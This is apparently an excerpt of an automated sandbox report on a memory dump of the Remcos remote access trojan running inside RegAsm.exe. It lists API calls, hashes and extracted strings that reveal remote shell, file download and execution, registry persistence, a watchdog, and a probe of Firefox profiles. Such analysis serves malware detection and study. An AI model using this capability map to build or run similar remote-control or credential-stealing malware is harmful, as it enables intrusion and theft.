                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                                • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID:
                                                                • API String ID: 1818849710-0
                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: pQG
                                                                • API String ID: 176396367-3769108836
                                                                • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID: @
                                                                • API String ID: 1890195054-2766056989
                                                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                APIs
                                                                • _free.LIBCMT ref: 00446227
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap$_free
                                                                • String ID:
                                                                • API String ID: 1482568997-0
                                                                • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEventStartupsocket
                                                                • String ID:
                                                                • API String ID: 1953588214-0
                                                                • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                APIs
                                                                • GetForegroundWindow.USER32 ref: 0041BB49
                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$ForegroundText
                                                                • String ID:
                                                                • API String ID: 29597999-0
                                                                • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                APIs
                                                                • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                  • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                • String ID:
                                                                • API String ID: 1170566393-0
                                                                • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID:
                                                                • API String ID: 724789610-0
                                                                • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                APIs
                                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Deallocatestd::_
                                                                • String ID:
                                                                • API String ID: 1323251999-0
                                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: recv
                                                                • String ID:
                                                                • API String ID: 1507349165-0
                                                                • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: send
                                                                • String ID:
                                                                • API String ID: 2809346765-0
                                                                • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                • API String ID: 1067849700-181434739
                                                                • Opcode ID: 4b7f7d1206543e90f9d43660aaa20adae5c346977114bad7fc5ffa3ba2895adf
                                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                • Opcode Fuzzy Hash: 4b7f7d1206543e90f9d43660aaa20adae5c346977114bad7fc5ffa3ba2895adf
                                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                • API String ID: 2994406822-18413064
                                                                • Opcode ID: b2d82c10f2debf51222373f7a3e4651be4bb46aebb09b74c8cfb6043f73c9cfb
                                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                • Opcode Fuzzy Hash: b2d82c10f2debf51222373f7a3e4651be4bb46aebb09b74c8cfb6043f73c9cfb
                                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                • API String ID: 3018269243-13974260
                                                                • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
